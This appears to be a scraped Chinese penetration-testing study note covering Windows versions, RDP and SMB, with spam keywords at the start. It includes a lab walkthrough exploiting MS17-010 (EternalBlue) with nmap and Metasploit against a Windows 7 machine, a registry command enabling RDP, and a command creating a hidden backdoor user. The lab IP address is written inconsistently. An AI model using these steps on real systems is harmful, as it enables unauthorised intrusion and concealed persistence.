销售型企业网站有哪些,手机手机端网站建设,重要新闻事件,wordpress 怎么读今天我们学Windows操作系统 一、Windows操作系统基础认知 1.操作系统的核心概念:操作系统又简Operating system简称os。是管理和控制计算机硬件和软件资源的核心程序#xff0c;是直接运行在裸机上最基本的#xff0c;的系统软件#xff0c;所有其他软件都必须在操作系统的支…今天我们学Windows操作系统一、Windows操作系统基础认知1.操作系统的核心概念:操作系统又简Operating system简称os。是管理和控制计算机硬件和软件资源的核心程序是直接运行在裸机上最基本的的系统软件所有其他软件都必须在操作系统的支持下才能运行。2.市面上主流操作系统分类:首先是Windows系统它是由微软研发图形界面友好兼容性强。应用的场景主要在企业服务器个人办公电脑或者是专用工业设备。然后是Linux系统他的特点是自由开源稳定性高安全性强。应用场景主要是在服务器或者是嵌入式设备还有渗透测试的环境中。最后是macos系统它的核心特点是苹果专用生态闭环用户体验感极佳。应用场景是设计师和开发者工作站。二、Windows版本差异与渗透场景1.老旧个人设备:代表版本是Windows7老旧个人设备系统是一种高漏洞高风险的系统应用场景主要是用在制造业cnc设备控制和医疗影像终端还有老旧办公电脑攻击难度较简单。2.现代个人设备系统:代表版本是Windows10。和win11应用场景主要是企业办公终端开发者工作站渗透关注点是需突破硬件级的防护与行为检测机制攻击难度显著提升。3.服务器系统:代表版本Windowsserver20082012201620192022应用场景是企业内网文件服务器或者是数据库服务器还有web服务器域控制器。他的渗透关注点在掌握服务器核心服务的配置漏洞是获取内网控制权的关键。三、Windows核心服务认知1.RDP服务定义:微软专用远程控制协议默认占用3389端口支持图形化界面远程操作。应用场景是用在远程办公配合VPN使用或者是服务器远程管理技术支持和云桌面服务。他的安全关联是弱密码未限制登录IP开启默认端口等配置不当的情况易被暴力破解或远程攻击是渗透测试中高频关注的服务。四、Windows远程RDP连接的前提1.两台电脑。控制端和被控制端必须处于同一个网络比如同一个WiFi或者是同一个路由器而且要保证网络正常联通不能断网。2.被控制的电脑必须开启远程桌面功能。方法一图形化开启远程桌面服务先找到电脑左下角的控制编码找到计算机在计算机里面选择属性打开进入之后找到远程设置选择允许运行任意版本远程桌面的计算机连接然后再点应用。方法二命令开启远程桌面服务需要与管理员身份运行cmd窗口先按住win和r键再输入cmd打开cmd窗口输入命令reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD /d 0 /f被控制的电脑需要登录的Windows账号和密码控制端电脑需知道被控制的电脑的IP地址或者是同一网络下的电脑名称才能定位并连接。两台电脑的防火墙需允许远程桌面的相关链接默认开启远程桌面后防火墙会自动唤醒不用做额外的操作五、Windows系统服务安全1.Windows经典系统漏洞:M17-010永恒之蓝漏洞背景:2017年5月延伸出的,wannacry勒索病毒全球爆发。影响范围:波及全球学校和企业病毒加密用户文件后要求支付比特币赎金才能恢复。漏洞原理利用Windows SMBv1协议的漏洞。无需用户交互即可远程执行恶意代码。2.SMB协议基础定义:客户机,服务器架构的请求和响应协议主要用于文件共享打印机共享网络登录等。关联端口:Tcp139端口Netbios会话端口)Tcp445端口SMB直接连接端口日常应用:Windows系统网上邻居功能的底层依赖协议。3.漏洞利用实验kali 加win7实验环境:攻击机kali linux去联网配置安装。Metasploit框架)目标机:Windows7旗舰版IP是192.168.175.1304.利用步骤:首先漏洞扫描通过map脚本检测目标是否存在ms17-010漏洞。操作第一步输入nmap --script smb-vuln* 192.168.157.130若显示vulnerable则确认目标存在该漏洞。操作第二步启动metasploit输入metasploit。操作第三步,搜索并加载漏洞利用模块。search ms17-010 # 搜索相关模块use exploit/windows/smb/ms17_010_eternalblue # 选择永恒之蓝利⽤模块输⼊对应序号也可操作第四步配置攻击参数show options # 查看需要配置的参数set rhosts 192.168.157.130 # 设置⽬标机 IPset lhost 192.168.157.129 # 设置攻击机 IPKali 本机 IP操作第五步执行攻击获取meterpreter会话输入exploit攻击成功后将会获得目标机的meterpreter交互式对话。5.Metrpreter核心操作常用的命令。六、Windows用户与组的管理七、核心管理命令Cmd命令八、安全后门:隐藏用户和影子用户。隐藏用户简单隐藏易排查创建命令:net user gaga$ 123456 /add ⽤户名后加 $ 默认不在计算机管理和 net user 列表中显示影子用户